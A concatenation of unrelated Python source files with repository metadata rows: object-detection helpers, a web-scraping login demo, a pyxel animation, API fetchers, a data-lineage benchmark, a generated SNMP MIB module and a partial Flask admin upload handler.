    ``(img, boxes, confidences, classids, idxs, x, y, w, h)`` where the last
    four values describe the final box drawn.

    :raises Exception: when ``infer=False`` but no prior detections were passed.
    """
    if infer:
        # Constructing a blob from the input image
        blob = cv.dnn.blobFromImage(img, 1 / 255.0, (416, 416),
                                    swapRB=True, crop=False)
        # Perform a forward pass of the YOLO object detector
        net.setInput(blob)
        # Getting the outputs from the output layers
        outs = net.forward(layer_names)
        # Generate the boxes, confidences, and classIDs
        boxes, confidences, classids = generate_boxes_confidences_classids(outs, height, width, confidence)
        # Apply Non-Maxima Suppression to suppress overlapping bounding boxes
        idxs = cv.dnn.NMSBoxes(boxes, confidences, confidence, threshold)
    if boxes is None or confidences is None or idxs is None or classids is None:
        raise Exception('[ERROR] Required variables are set to None before drawing boxes on images.')
    # Draw labels and boxes on the image
    img, x, y, w, h = draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels)
    return img, boxes, confidences, classids, idxs, x, y, w, h
def show_progress_bar(count, total, num_images, diff, name, pid, status=''):
    """Write one progress line for *name* to stdout.

    :param count: frames processed so far
    :param total: total number of frames
    :param num_images: images saved so far (shown in brackets)
    :param diff: average seconds per frame, used for the ETA
    :param name: job label printed before the bar
    :param pid: worker id (currently unused in the output)
    :param status: optional trailing status text
    """
    bar_length = 40
    filled_length = int(round(bar_length * count / float(total)))
    percentage = round(100.0 * count / float(total), 1)
    bar = '=' * filled_length + '-' * (bar_length - filled_length)
    sec_left = diff * (total - count)
    eta = time.strftime('%Hh, %Mm, %Ss', time.gmtime(sec_left))
    sys.stdout.write(f"{name}:[{bar}] {percentage}% ({eta}) [{num_images}] ...{status}\r\n")
def count_frames_manual(video):
    """Count frames by reading *video* to the end; releases the capture."""
    total = 0
    grabbed, _frame = video.read()
    while grabbed:
        total += 1
        grabbed, _frame = video.read()
    video.release()
    return total
| 42.787946 | 194 | 0.440816 | 1,807 | 19,169 | 4.559491 | 0.210293 | 0.025246 | 0.032043 | 0.012137 | 0.220658 | 0.181818 | 0.154995 | 0.125865 | 0.125865 | 0.116883 | 0 | 0.009754 | 0.475873 | 19,169 | 447 | 195 | 42.883669 | 0.810292 | 0.098284 | 0 | 0.271566 | 0 | 0 | 0.05883 | 0.001276 | 0 | 0 | 0.000232 | 0.002237 | 0 | 1 | 0.035144 | false | 0 | 0.019169 | 0 | 0.073482 | 0.067093 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5862640078cc1b43e3103a6081579e3c5f73b50 | 1,386 | py | Python | collectDataFromNet/postTest.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | collectDataFromNet/postTest.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | collectDataFromNet/postTest.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import requests
def simple_post_test():
    """POST a simple form and print the server's echoed response."""
    form_data = {'firstname': 'Ryan', 'lastname': 'Mitchell'}
    response = requests.post("http://pythonscraping.com/files/processing.php", data=form_data)
    print(response.text)
def cookie_test():
    """Log in, show the cookies we got back, then reuse them on a second page."""
    credentials = {'username': 'Ryan', 'password': 'password'}
    login = requests.post("http://pythonscraping.com/pages/cookies/welcome.php", credentials)
    print("Cookie is set to:")
    print(login.cookies.get_dict())
    print("------------------")
    print("Going to profile page...")
    profile = requests.get("http://pythonscraping.com/pages/cookies/profile.php", cookies=login.cookies)
    print(profile.text)
def session_test():
    """Same flow as cookie_test but let a requests.Session carry the cookies."""
    session = requests.Session()
    credentials = {'username': 'username', 'password': 'password'}
    login = session.post("http://pythonscraping.com/pages/cookies/welcome.php", credentials)
    print("Cookie is set to:")
    print(login.cookies.get_dict())
    print("-----------------")
    print("Going to profile page...")
    profile = session.get("http://pythonscraping.com/pages/cookies/profile.php")
    print(profile.text)
def auth_test():
    """POST with HTTP Basic auth and print the response body."""
    # AuthBase was imported here but never used; the unused import is removed.
    from requests.auth import HTTPBasicAuth
    auth = HTTPBasicAuth('ryan', 'password')
    r = requests.post(url="http://pythonscraping.com/pages/auth/login.php", auth=auth)
    print(r.text)
if __name__ == '__main__':
auth_test() | 30.130435 | 94 | 0.647186 | 172 | 1,386 | 5.122093 | 0.30814 | 0.122588 | 0.143019 | 0.14756 | 0.421112 | 0.421112 | 0.372304 | 0.372304 | 0.267877 | 0.172531 | 0 | 0.001709 | 0.155844 | 1,386 | 46 | 95 | 30.130435 | 0.751282 | 0.032468 | 0 | 0.21875 | 0 | 0 | 0.389552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.09375 | 0.09375 | 0 | 0.21875 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5882538b7bda731c247750333cac651bac62825 | 775 | py | Python | python_pyxel/pyxel1.py | Perceu/tiktok | c3da4d0a6300867737c1574a552100bdf5eed10f | [
"MIT"
] | null | null | null | python_pyxel/pyxel1.py | Perceu/tiktok | c3da4d0a6300867737c1574a552100bdf5eed10f | [
"MIT"
] | null | null | null | python_pyxel/pyxel1.py | Perceu/tiktok | c3da4d0a6300867737c1574a552100bdf5eed10f | [
"MIT"
] | null | null | null | from turtle import width
import pyxel
from random import randint
class App:
def __init__(self):
width, height = 720, 1280
pyxel.init(width, height)
self.raio = 10
self.color = 1
self.position_x = int(width/2)
self.position_y = int(height/2)
pyxel.run(self.update, self.draw)
def update(self):
if pyxel.btnp(pyxel.KEY_Q):
pyxel.quit()
self.raio = (self.raio + 10) % pyxel.width
if self.raio <= 10:
self.position_x = randint(200,500)
self.position_y = randint(200,1000)
self.color = (self.color + 1) % 15
def draw(self):
pyxel.cls(0)
pyxel.circb(self.position_x, self.position_y, self.raio, self.color)
App() | 23.484848 | 76 | 0.575484 | 106 | 775 | 4.103774 | 0.367925 | 0.165517 | 0.068966 | 0.064368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061682 | 0.309677 | 775 | 33 | 77 | 23.484848 | 0.751402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e589291903c062b835adf5adc75c3f7669bcca6a | 723 | py | Python | dataset.py | chengsen/Pytorch_model_train_template | 7da63210ac4015df74baef0205776abe9dc2b5d8 | [
"MIT"
] | null | null | null | dataset.py | chengsen/Pytorch_model_train_template | 7da63210ac4015df74baef0205776abe9dc2b5d8 | [
"MIT"
] | null | null | null | dataset.py | chengsen/Pytorch_model_train_template | 7da63210ac4015df74baef0205776abe9dc2b5d8 | [
"MIT"
] | null | null | null | from torch.utils.data import DataLoader, Dataset
__build__ = 2018
__author__ = "singsam_jam@126.com"
def get_loader(args, kwargs):
train_loader = DataLoader(dataset=ModelDataset, batch_size=args.test_batch_size, collate_fn=collate_fn, shuffle=True,
**kwargs)
test_loader = DataLoader(dataset=ModelDataset, batch_size=args.test_batch_size, collate_fn=collate_fn, shuffle=False,
**kwargs)
return train_loader, test_loader
class ModelDataset(Dataset):
def __init__(self):
pass
def __getitem__(self, index):
item = None
return item
def __len__(self):
raise NotImplementedError
def collate_fn():
pass
| 25.821429 | 121 | 0.672199 | 84 | 723 | 5.345238 | 0.488095 | 0.100223 | 0.10245 | 0.155902 | 0.383074 | 0.383074 | 0.383074 | 0.383074 | 0.383074 | 0.383074 | 0 | 0.012844 | 0.246196 | 723 | 27 | 122 | 26.777778 | 0.811009 | 0 | 0 | 0.210526 | 0 | 0 | 0.026279 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0.105263 | 0.052632 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e5893301e5d8b6496d1b088428d496d181d86dbc | 2,386 | py | Python | get_apis.py | Pemacope/Assessment_3 | 37591a8c2245b0d64dcb1b75326a7a82de45480f | [
"Unlicense"
] | null | null | null | get_apis.py | Pemacope/Assessment_3 | 37591a8c2245b0d64dcb1b75326a7a82de45480f | [
"Unlicense"
] | null | null | null | get_apis.py | Pemacope/Assessment_3 | 37591a8c2245b0d64dcb1b75326a7a82de45480f | [
"Unlicense"
] | null | null | null | from uk_covid19 import Cov19API
import geocoder
import logging
import requests
import json
logging.basicConfig(filename = "sys.log", encoding = 'utf-8')
#get_location function
def get_location():
    """Return the user's current city, resolved from their IP address."""
    return geocoder.ip('me').city
#get news function
def get_news() -> None:
    """Fetch top UK headlines from the News API and cache them in news.json."""
    base_url = "https://newsapi.org/v2/top-headlines?"
    with open('config.json', 'r') as config_file:
        temp = json.load(config_file)
        api_key = temp["keys"]["news_key"]
    country = "gb"
    complete_url = base_url + "country=" + country + "&apiKey=" + api_key
    response = requests.get(complete_url, timeout = 10)
    # Bug fix: the original logged failure when status_code <= 400, i.e. on
    # every successful (2xx) response; sibling get_weather correctly uses >= 400.
    if response.status_code >= 400:
        logging.info('News request failed')
    # store news in file
    with open('news.json', 'w') as news_file:
        json.dump(response.json(), news_file)
#get weather function
def get_weather() -> None:
    """Fetch current weather for the user's city and cache it in weather.json."""
    with open('config.json', 'r') as config_file:
        api_key = json.load(config_file)["keys"]["weather_key"]
    request_url = (
        "http://api.openweathermap.org/data/2.5/weather?"
        + "appid=" + api_key + "&q=" + get_location()
    )
    response = requests.get(request_url, timeout = 10)
    if response.status_code >= 400:
        logging.info('Weather request failed')
    # store weather data in file
    with open('weather.json', 'w') as weather_file:
        json.dump(response.json(), weather_file)
#get uk covid numbers
def get_covid() -> None:
    """Fetch local new-case numbers from the UK covid API into a JSON file."""
    filters = [
        'areaName={}'.format(get_location())
    ]
    structure = {
        "date": "date",
        "areaName": "areaName",
        "newCasesByPublishDate": "newCasesByPublishDate"
    }
    api = Cov19API(filters = filters, structure = structure)
    # store covid data in file
    with open('public_health_england.json', 'w') as covid_file:
        json.dump(api.get_json(), covid_file)
| 28.404762 | 74 | 0.602263 | 291 | 2,386 | 4.769759 | 0.316151 | 0.028818 | 0.030259 | 0.041066 | 0.262248 | 0.201729 | 0.201729 | 0.201729 | 0.201729 | 0.201729 | 0 | 0.011608 | 0.277871 | 2,386 | 83 | 75 | 28.746988 | 0.793964 | 0.126991 | 0 | 0.170213 | 0 | 0 | 0.174442 | 0.034483 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.106383 | 0 | 0.212766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e58b7e482ceb4804189a6da6cf34ef3305149a16 | 81 | py | Python | tests/unit/system_status/formatters/__init__.py | BMeu/Orchard | cd595c9942e4e1ad0032193059f2b39fdf3bcfba | [
"MIT"
] | 2 | 2016-10-06T21:19:32.000Z | 2016-10-06T21:58:04.000Z | tests/unit/system_status/formatters/__init__.py | BMeu/Orchard | cd595c9942e4e1ad0032193059f2b39fdf3bcfba | [
"MIT"
] | 392 | 2016-10-06T17:13:30.000Z | 2021-01-15T04:15:38.000Z | tests/unit/system_status/formatters/__init__.py | BMeu/Orchard | cd595c9942e4e1ad0032193059f2b39fdf3bcfba | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Unit Test: orchard.system_status.formatters
"""
| 13.5 | 47 | 0.592593 | 9 | 81 | 5.222222 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015152 | 0.185185 | 81 | 5 | 48 | 16.2 | 0.69697 | 0.814815 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 4 |
e58ccf5e4c1a6de4e6e01e0244878e63b72d84c5 | 5,522 | py | Python | benchmark/how_lineage_benchmark.py | ZhuofanXie/DataTracer | 718f58ca87f297e7541c910a53ca8dde8ed7b66e | [
"MIT"
] | null | null | null | benchmark/how_lineage_benchmark.py | ZhuofanXie/DataTracer | 718f58ca87f297e7541c910a53ca8dde8ed7b66e | [
"MIT"
] | null | null | null | benchmark/how_lineage_benchmark.py | ZhuofanXie/DataTracer | 718f58ca87f297e7541c910a53ca8dde8ed7b66e | [
"MIT"
] | null | null | null | import time
from time import time
import dask
import pandas as pd
from dask.diagnostics import ProgressBar
import datatracer
def transform_single_column(tables, column_info):
    """Materialize one lineage source column as a numpy array.

    Args:
        tables: Mapping of table name -> DataFrame.
        column_info: Lineage-column dict with 'source_col' (table/column
            names), 'aggregation' (expression string or falsy) and
            'row_map' (foreign-key mapping passed to the aggregator).

    Returns:
        The column values, either passed through (NaNs replaced by 0.0)
        or produced by the named aggregation.
    """
    source = column_info['source_col']
    aggregation = column_info['aggregation']
    if not aggregation:
        # No aggregation: take the raw column with NaNs zero-filled.
        return tables[source['table_name']][source['col_name']].fillna(0.0).values
    # NOTE(review): eval() on a metadata-supplied string — assumes the
    # lineage metadata is trusted input.
    aggregator = eval(aggregation)
    return aggregator(tables, column_info['row_map'], source['col_name'])
def produce_target_column(tables, map_info):
    """Replay a predicted lineage mapping to rebuild the target column.

    Args:
        tables: Mapping of table name -> DataFrame.
        map_info: Solver output with a 'transformation' expression string
            and the 'lineage_columns' it combines.

    Returns:
        The reconstructed column values, or None when no transformation
        was predicted.
    """
    transformation = map_info['transformation']
    if not transformation:
        return None
    # Materialize every source column, then combine them with the
    # predicted transformation (eval'd from the solver's output string).
    columns = [transform_single_column(tables, info)
               for info in map_info['lineage_columns']]
    combiner = eval(transformation)
    return combiner(columns)
def approx_equal(num, target, add_margin, multi_margin):
    """Return True when num lies within an additive + multiplicative band of target.

    The band is target +/- (multi_margin * |target|) widened by add_margin
    on each side; the two branches keep the arithmetic identical to the
    sign of target.
    """
    if target >= 0:
        upper = target * (1 + multi_margin) + add_margin
        lower = target * (1 - multi_margin) - add_margin
    else:
        # For negative targets the multiplicative factors swap roles.
        upper = target * (1 - multi_margin) + add_margin
        lower = target * (1 + multi_margin) - add_margin
    return lower <= num <= upper
def approx_equal_arrays(num, target, add_margin, multi_margin):
    """Elementwise approx_equal over two sequences.

    Pairs are compared via zip, so any trailing elements of the longer
    sequence are ignored (matching the original loop's behavior).
    """
    return all(
        approx_equal(n, t, add_margin, multi_margin)
        for n, t in zip(num, target)
    )
@dask.delayed
def evaluate_single_lineage(constraint, tracer, tables):
    """Evaluate one lineage constraint against a fitted tracer.

    Compares the solver's predicted source columns with the ground-truth
    related fields; only when the two column sets match exactly does it
    replay the predicted transformation and check that it reproduces the
    target column.

    Args:
        constraint: Metadata constraint dict with
            "fields_under_consideration" and "related_fields" entries.
        tracer: A fitted datatracer solver.
        tables: Mapping of table name -> DataFrame.

    Returns:
        A dict with the target table/field, a 0/1 precision score, the
        inference time in seconds, and an "OK"/"ERROR" status.
    """
    field = constraint["fields_under_consideration"][0]
    related_fields = constraint["related_fields"]
    # Ground truth: set of (table, field) pairs the target derives from.
    y_true = set()
    for related_field in related_fields:
        y_true.add((related_field["table"], related_field["field"]))
    try:
        start = time()
        ret_dict = tracer.solve(tables, target_table=field["table"], target_field=field["field"])
        y_pred = {(col['source_col']['table_name'], col['source_col']['col_name'])
                  for col in ret_dict['lineage_columns']}
        end = time()
    except BaseException:
        # NOTE(review): deliberately broad — any solver failure is scored
        # as precision 0 rather than aborting the benchmark.
        return {
            "table": field["table"],
            "field": field["field"],
            "precision": 0,
            "inference_time": 0,
            "status": "ERROR",
        }
    # Exact set equality between predicted and true source columns.
    if len(y_pred) == len(y_true) and \
            len(y_true.intersection(y_pred)) == len(y_pred):
        # Column sets match — now check the transformation itself by
        # rebuilding the target column and comparing within tolerance.
        predicted_target = produce_target_column(tables, ret_dict)
        target_column = tables[field["table"]][field["field"]].fillna(0.0).values
        if approx_equal_arrays(predicted_target, target_column, 1e-8, 1e-8):
            precision = 1
        else:
            precision = 0
    else:
        precision = 0
    return {
        "table": field["table"],
        "field": field["field"],
        "precision": precision,
        "inference_time": end - start,
        "status": "OK",
    }
@dask.delayed
def how_lineage(solver, target, datasets):
    """Benchmark the how lineage solver on the target dataset.

    Args:
        solver: The name of the how lineage pipeline.
        target: The name of the target dataset.
        datasets: A dictionary mapping dataset names to (metadata, tables) tuples.

    Returns:
        A list of dictionaries mapping metric names to values for each derived
        column, or an empty dict when the dataset declares no constraints.
    """
    # Leave-one-out: fit on every dataset except the evaluation target.
    datasets = datasets.copy()
    metadata, tables = datasets.pop(target)
    if not metadata.data.get("constraints"):
        return {}  # Skip dataset, no constraints found.
    tracer = datatracer.DataTracer(solver)
    tracer.fit(datasets)
    list_of_metrics = []
    for constraint in metadata.data["constraints"]:
        # Each constraint becomes its own dask-delayed evaluation task.
        list_of_metrics.append(evaluate_single_lineage(constraint, tracer, tables))
    # Resolve the per-constraint delayed tasks into concrete dicts.
    list_of_metrics = dask.compute(list_of_metrics)[0]
    return list_of_metrics
def benchmark_how_lineage(data_dir, dataset_name=None, solver="datatracer.how_lineage.basic"):
    """Benchmark the how lineage solver.

    This uses leave-one-out validation and evaluates the performance of the
    solver on the specified datasets.

    Args:
        data_dir: The directory containing the datasets.
        dataset_name: The target dataset to test on. If none is provided, will test on all available datasets by default.
        solver: The name of the column map pipeline.

    Returns:
        A DataFrame containing the benchmark results, or None when
        ``dataset_name`` was given but is not among the loaded datasets.
    """
    datasets = datatracer.load_datasets(data_dir)
    dataset_names = list(datasets.keys())
    if dataset_name is not None:
        if dataset_name in dataset_names:
            dataset_names = [dataset_name]
        else:
            # Unknown dataset name: nothing to benchmark.
            return None
    # Wrap once so every delayed task shares a single loaded-data node
    # in the dask graph.
    datasets = dask.delayed(datasets)
    dataset_to_metrics = {}
    for dataset_name in dataset_names:
        dataset_to_metrics[dataset_name] = how_lineage(
            solver=solver, target=dataset_name, datasets=datasets)
    rows = []
    with ProgressBar():
        # Trigger the whole delayed graph; one metrics list per dataset.
        results = dask.compute(dataset_to_metrics)[0]
    for dataset_name, list_of_metrics in results.items():
        for metrics in list_of_metrics:
            metrics["dataset"] = dataset_name
            rows.append(metrics)
    df = pd.DataFrame(rows)
    # Reorder so the identifying columns (dataset, table, field) come first.
    dataset_col = df.pop('dataset')
    table_col = df.pop('table')
    field_col = df.pop('field')
    df.insert(0, 'field', field_col)
    df.insert(0, 'table', table_col)
    df.insert(0, 'dataset', dataset_col)
    return df
| 33.877301 | 121 | 0.641434 | 672 | 5,522 | 5.06994 | 0.227679 | 0.032286 | 0.02671 | 0.017611 | 0.154975 | 0.127972 | 0.066921 | 0.066921 | 0.040505 | 0.040505 | 0 | 0.005854 | 0.257515 | 5,522 | 162 | 122 | 34.08642 | 0.825122 | 0.143064 | 0 | 0.155172 | 0 | 0 | 0.086788 | 0.0116 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060345 | false | 0 | 0.051724 | 0 | 0.232759 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e58deea7e4ceca8f46170fba5c491445e89261b9 | 4,606 | py | Python | pysnmp/H323-TRAP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/H323-TRAP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/H323-TRAP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module H323-TRAP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/H323-TRAP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:07:51 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE: `mibBuilder` is injected by the pysnmp/pysmi MIB loader when this
# generated module is executed; it is not defined in this file.
# Varbind objects re-used from AGGREGATED-EXT-MIB (attached to the traps below).
gwID, timeOccurred, reason, registrationStatus, comment, gwType, csID, port, percent, csType, gwIP, moduleID, code = mibBuilder.importSymbols("AGGREGATED-EXT-MIB", "gwID", "timeOccurred", "reason", "registrationStatus", "comment", "gwType", "csID", "port", "percent", "csType", "gwIP", "moduleID", "code")
# Core ASN.1 types and constraint helpers.
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint")
# SMIv2 conformance, base SMI constructs and textual conventions.
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
TimeTicks, enterprises, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectName, Counter64, Unsigned32, snmpModules, ObjectIdentity, MibIdentifier, Gauge32, IpAddress, Counter32, NotificationType, ModuleIdentity, Bits, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "enterprises", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectName", "Counter64", "Unsigned32", "snmpModules", "ObjectIdentity", "MibIdentifier", "Gauge32", "IpAddress", "Counter32", "NotificationType", "ModuleIdentity", "Bits", "Integer32")
TestAndIncr, DisplayString, RowStatus, TruthValue, TimeStamp, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TestAndIncr", "DisplayString", "RowStatus", "TruthValue", "TimeStamp", "TextualConvention")
# OID registration under enterprises.lucent(1751).products(1).softSwitch(1198).h323DeviceServer(3).
lucent = MibIdentifier((1, 3, 6, 1, 4, 1, 1751))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1))
softSwitch = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198))
h323DeviceServer = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3))
h323Traps = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0))
if mibBuilder.loadTexts: h323Traps.setLastUpdated('240701')
if mibBuilder.loadTexts: h323Traps.setOrganization('Lucent Technologies')
# NOTIFICATION-TYPE (trap) definitions; setObjects lists each trap's varbinds.
h323CSConnectionStatus = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 0)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "csID"), ("AGGREGATED-EXT-MIB", "csType"), ("AGGREGATED-EXT-MIB", "registrationStatus"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323CSConnectionStatus.setStatus('current')
h323GatewayUtilization = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 1)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "moduleID"), ("AGGREGATED-EXT-MIB", "percent"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323GatewayUtilization.setStatus('current')
h323DSError = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 2)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323DSError.setStatus('current')
h323UnreachableGateway = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 3)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "gwID"), ("AGGREGATED-EXT-MIB", "gwType"), ("AGGREGATED-EXT-MIB", "gwIP"), ("AGGREGATED-EXT-MIB", "port"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323UnreachableGateway.setStatus('current')
h323CommandFailed = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 4)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323CommandFailed.setStatus('current')
# Export the defined symbols so dependent MIB modules can import them.
mibBuilder.exportSymbols("H323-TRAP-MIB", h323CSConnectionStatus=h323CSConnectionStatus, h323UnreachableGateway=h323UnreachableGateway, h323CommandFailed=h323CommandFailed, softSwitch=softSwitch, products=products, h323Traps=h323Traps, PYSNMP_MODULE_ID=h323Traps, h323GatewayUtilization=h323GatewayUtilization, h323DSError=h323DSError, h323DeviceServer=h323DeviceServer, lucent=lucent)
| 139.575758 | 559 | 0.745766 | 507 | 4,606 | 6.771203 | 0.266272 | 0.109816 | 0.135159 | 0.011652 | 0.543548 | 0.485872 | 0.445674 | 0.420041 | 0.413341 | 0.40635 | 0 | 0.077867 | 0.079896 | 4,606 | 32 | 560 | 143.9375 | 0.732185 | 0.069475 | 0 | 0 | 0 | 0 | 0.325929 | 0.010288 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.28 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e58f4679796a04818a079751cf89d2d05f6670ee | 2,132 | py | Python | admin.py | dikshith/allcode | b5563f9d9f1839c50396a2d4de70aac5bceb318f | [
"MIT"
] | null | null | null | admin.py | dikshith/allcode | b5563f9d9f1839c50396a2d4de70aac5bceb318f | [
"MIT"
] | null | null | null | admin.py | dikshith/allcode | b5563f9d9f1839c50396a2d4de70aac5bceb318f | [
"MIT"
] | null | null | null | # save this as app.py
from __main__ import app, ALLOWED_EXTENSIONS, UPLOAD_FOLDER
from flask import Flask, request, jsonify, abort, render_template, Flask, flash, redirect, url_for
from werkzeug.utils import secure_filename
import os
import io
import csv
from models import *
def allowed_file(filename):
    """Return True when filename carries an extension in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
def transform(text_file_contents):
    """Rewrite '='-separated upload content as comma-separated text."""
    return ",".join(text_file_contents.split("="))
@app.route("/admin", methods=["GET", "POST"])
def admin():
    """Admin upload endpoint.

    POST: accept a CSV of performance results (columns look like a JMeter
    aggregate report — TODO confirm), save the file under UPLOAD_FOLDER,
    create a release_version row and one performance_results row per
    CSV line, then redirect back.
    GET: render the admin page (NOTE(review): returned with status 404 —
    confirm that is intentional).
    """
    if request.method == "POST":
        # NOTE(review): `table` is read from the form but never used.
        table = request.form.get("table")
        if 'csv' not in request.files:
            flash('No file part')
            return redirect(request.url)
        file = request.files['csv']
